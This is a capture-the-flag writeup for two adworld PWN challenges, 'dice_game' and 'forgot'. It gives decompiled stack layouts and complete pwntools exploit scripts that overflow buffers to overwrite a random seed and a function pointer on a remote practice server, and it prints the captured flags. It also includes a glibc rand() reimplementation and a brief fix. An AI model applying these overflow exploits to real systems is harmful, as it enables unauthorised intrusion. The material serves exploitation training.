
攻防世界 (adworld) - Expert Area - PWN Section - Writeup

source link: https://iamywang.github.io/2020/adworld-pwn-2/

0x01 dice_game

char buf[55]; // [rsp+0h] [rbp-50h]
char v5; // [rsp+37h] [rbp-19h]
ssize_t v6; // [rsp+38h] [rbp-18h]
unsigned int seed[2]; // [rsp+40h] [rbp-10h]
unsigned int v8; // [rsp+4Ch] [rbp-4h]

Overwrite seed so that the pseudo-random sequence becomes fixed and predictable.
buf sits at rbp-0x50 and seed at rbp-0x10, so pad with 0x40 bytes of filler and then append p64(1), which sets seed to 1.

from pwn import *

p = remote('220.249.52.133', 54186)

# 0x40 bytes of padding reach seed (rbp-0x10 minus rbp-0x50); p64(1) sets it to 1
payload = b'A' * 0x40 + p64(1)
p.sendlineafter(b'your name: ', payload)
# the 50 rolls the game produces once seed == 1, precomputed
a = '2 5 4 2 6 2 5 1 4 2 3 2 3 2 6 5 1 1 5 5 6 3 4 4 3 3 3 2 2 2 6 1 1 1 6 4 2 5 2 5 4 4 4 6 3 2 3 3 6 1'.split(' ')
print(len(a))  # sanity check: must be 50
for i in range(50):
    p.sendlineafter(b'point(1~6): ', a[i].encode())
p.interactive()
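An added example (not from the writeup) that reproduces glibc's rand() in pure Python to show why a seed of 1 makes all 50 rolls predictable; it assumes the game computes each roll as rand() % 6 + 1 after srand(seed), which is what the sequence above implies.

```python
# Added example, not from the original writeup. Assumption: the game calls
# srand(seed) once and then rand() % 6 + 1 for each roll. glibc's default
# rand() is an additive feedback generator seeded by an LCG, so once the
# seed is known every output is known.

WRITEUP_ROLLS = [int(x) for x in
    '2 5 4 2 6 2 5 1 4 2 3 2 3 2 6 5 1 1 5 5 6 3 4 4 3 3 3 2 2 2 '
    '6 1 1 1 6 4 2 5 2 5 4 4 4 6 3 2 3 3 6 1'.split()]


def glibc_rand(seed, n):
    """Return the first n values of glibc rand() after srand(seed).

    The 31-word state is filled with a 16807 LCG, then extended as
    r[i] = (r[i-31] + r[i-3]) mod 2^32. glibc discards the first 310
    outputs, so the first value handed to the caller is r[344] >> 1.
    Assumes a positive 32-bit seed (the writeup uses 1).
    """
    if seed == 0:          # glibc treats a seed of 0 as 1
        seed = 1
    r = [0] * 344
    r[0] = seed
    for i in range(1, 31):
        r[i] = (16807 * r[i - 1]) % 2147483647
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344):
        r[i] = (r[i - 31] + r[i - 3]) & 0xffffffff
    out = []
    for _ in range(n):
        r.append((r[-31] + r[-3]) & 0xffffffff)
        out.append(r[-1] >> 1)
    return out


def predict_rolls(seed, n=50):
    """Dice values shown for a known seed: rand() % 6 + 1 (assumed formula)."""
    return [v % 6 + 1 for v in glibc_rand(seed, n)]


def matching_prefix(seed=1):
    """How many leading rolls of the writeup's sequence the prediction reproduces."""
    pred = predict_rolls(seed, len(WRITEUP_ROLLS))
    k = 0
    while k < len(pred) and pred[k] == WRITEUP_ROLLS[k]:
        k += 1
    return k


if __name__ == '__main__':
    print(glibc_rand(1, 3))     # [1804289383, 846930886, 1681692777]
    print(predict_rolls(1, 8))  # [2, 5, 4, 2, 6, 2, 5, 1]
    print(matching_prefix())
```

The fix on the program side is twofold: read the name with a length bound that cannot reach seed, and seed from a CSPRNG (for example getrandom) instead of a value that sits in overwritable stack memory.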

Got the flag: cyberpeace{22068165d7b159caeea14a0985464246}

0x02 forgot

int sub_80486CC()
{
    char s; // [esp+1Eh] [ebp-3Ah]

    snprintf(&s, 0x32u, "cat %s", "./flag");
    return system(&s);
}

We need to build an overflow that redirects execution into this function, whose address is 0x080486CC.

...
    char v2[32]; // [esp+10h] [ebp-74h]
    int (*v3)(); // [esp+30h] [ebp-54h]
    int (*v4)(); // [esp+34h] [ebp-50h]
    int (*v5)(); // [esp+38h] [ebp-4Ch]
    int (*v6)(); // [esp+3Ch] [ebp-48h]
    int (*v7)(); // [esp+40h] [ebp-44h]
    int (*v8)(); // [esp+44h] [ebp-40h]
    int (*v9)(); // [esp+48h] [ebp-3Ch]
    int (*v10)(); // [esp+4Ch] [ebp-38h]
    int (*v11)(); // [esp+50h] [ebp-34h]
    int (*v12)(); // [esp+54h] [ebp-30h]
    char s; // [esp+58h] [ebp-2Ch]
    int v14; // [esp+78h] [ebp-Ch]
    size_t i; // [esp+7Ch] [ebp-8h]
...
    (*(&v3 + --v14))();
...

Note how these variables in main relate to each other: the overflow has to overwrite one of the variables with the address of the target function,
and the final value of v14 must then be exactly the offset of that variable from v3, so that the indirect call lands on it.
Observation: if the input consists of the character 'a', v14 ends up as 2.
So we overwrite v4.

from pwn import *

p = remote('220.249.52.133', 44606)

# v2 is at ebp-0x74 and v4 at ebp-0x50: 0x24 bytes of 'a' reach v4,
# and the 'a' input leaves v14 == 2, so (&v3)[1] == v4 is what gets called
payload = b'a' * 0x24 + p32(0x080486CC)
p.sendline(b'ttt')
p.sendlineafter(b'> ', payload)
p.interactive()

Resulting state:

v4 = 0x080486CC
v14 = 2
(*(&v3 + --v14))() therefore resolves to v3 + 1, which is the slot holding v4.

flag: cyberpeace{e6862a8733408cc383e336a39d611b47}
